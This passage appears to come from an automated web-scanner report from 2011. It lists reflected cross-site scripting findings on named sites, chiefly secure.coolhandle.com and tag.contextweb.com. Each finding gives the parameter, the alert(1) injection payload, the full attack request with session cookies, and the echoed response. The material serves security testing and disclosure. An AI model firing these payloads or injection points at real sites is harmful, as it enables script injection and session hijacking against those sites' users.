S5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT_qlR38hdCL1cJUSjCa6-qS_S-29zjxGrVJzGjilqbfEkblssZ3oY8EBiTaXzLFtyqqBeor7c8lwYqgvOkdv7T9_7l0B_Epu2spdJD4h6srOYOyvPs-cbWt3Zsh03akXwoACfppvlMTRqhvXWsl2fX0MhUevEGq1iNRzaKvd2XK6i1aN_2f2T_joajRqNC2KFBlwaF-qXHEx7n0l8K5AqGkS2zWZAZsF6nB55Y-VWuh8k6sEdq2OLdTG1Gbl2PHH_MoRk6zbQBZT5wF4bk7NkJmustC7KfRHZkja4jwEjLaHhlg7ZUy9vbeaGjpbb28szQXKPl5sWT_iHlCQFplL5g_xAwZZxozQ-vwjBbTKEOR4EClMFKBR7NeyYw5CdFipM4nWYHDpnm_yCk_BXR62GHnDChO7-X0Yxrune2xG-PTuWOxbQ3iHJMqt1A83xKmmTpf1YhIPQubDCvHxB0Aj59dKNWd1PyhyVvb3_Imo3z4jO4Q_3rN-08zinn8vOajT3qjsF6G3eK8GfPeHCjDxdpQTpQ; uid=8392341830659049202

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:03:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:03:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=3573749032740515380&fpid=4&nu=n&t=&sp=34084"><script>alert(1)</script>890b9545dd4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.219. https://secure.coolhandle.com/cart.php [domainoption parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /cart.php

Issue detail

The value of the domainoption request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc594'%3balert(1)//d6576d9822c20d453 was submitted in the domainoption parameter. This input was echoed as fc594';alert(1)//d6576d9822c20d453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cart.php?a=add&pid=9997177&o=billingcycle&billingcycle=monthly&domainoption=owndomainfc594'%3balert(1)//d6576d9822c20d453&sld%5B0%5D=&tld%5B0%5D=.com&sld%5B1%5D=&tld%5B1%5D=.com&sld%5B2%5D=&tld%5B2%5D=&sld%5B3%5D=&x=68&y=1 HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
Cache-Control: max-age=0
Origin: https://secure.coolhandle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:15:01 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
mentById('transfer').style.display='none';
document.getElementById('owndomain').style.display='none';
document.getElementById('subdomain').style.display='none';
document.getElementById('selowndomainfc594';alert(1)//d6576d9822c20d453').checked='true';
document.getElementById('owndomainfc594';alert(1)//d6576d9822c20d453').style.display='';
</script>
...[SNIP]...

1.220. https://secure.coolhandle.com/other/contactform_orderform.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /other/contactform_orderform.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8dc"><script>alert(1)</script>33e6208caae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:14:23 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 2984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="POST" action="/other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae">
...[SNIP]...

1.221. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a852e"%3balert(1)//cecb5ae80be was submitted in the action parameter. This input was echoed as a852e";alert(1)//cecb5ae80be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWADa852e"%3balert(1)//cecb5ae80be&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1561381710
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWADa852e";alert(1)//cecb5ae80be";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

1.222. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cbfc"%3balert(1)//0e17effbbec was submitted in the cwadformat parameter. This input was echoed as 9cbfc";alert(1)//0e17effbbec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X2509cbfc"%3balert(1)//0e17effbbec&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 657184314
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X2509cbfc";alert(1)//0e17effbbec";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

1.223. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c0f"%3balert(1)//2577733fa41 was submitted in the cwheight parameter. This input was echoed as c4c0f";alert(1)//2577733fa41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250c4c0f"%3balert(1)//2577733fa41&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2137648101
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250c4c0f";alert(1)//2577733fa41";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

1.224. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80c4"%3balert(1)//a8fe3b60eb9 was submitted in the cwpid parameter. This input was echoed as e80c4";alert(1)//a8fe3b60eb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848e80c4"%3balert(1)//a8fe3b60eb9&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2109950108
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848e80c4";alert(1)//a8fe3b60eb9";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase(
...[SNIP]...

1.225. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546d5"%3balert(1)//f902321b92e was submitted in the cwpnet parameter. This input was echoed as 546d5";alert(1)//f902321b92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1546d5"%3balert(1)//f902321b92e&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -923268318
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1546d5";alert(1)//f902321b92e";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

1.226. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 516e7"%3balert(1)//c92b78f2bd9 was submitted in the cwrun parameter. This input was echoed as 516e7";alert(1)//c92b78f2bd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200516e7"%3balert(1)//c92b78f2bd9&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 820981377
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200516e7";alert(1)//c92b78f2bd9";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

1.227. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4475e"%3balert(1)//3a7838ea4eb was submitted in the cwtagid parameter. This input was echoed as 4475e";alert(1)//3a7838ea4eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=880834475e"%3balert(1)//3a7838ea4eb HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
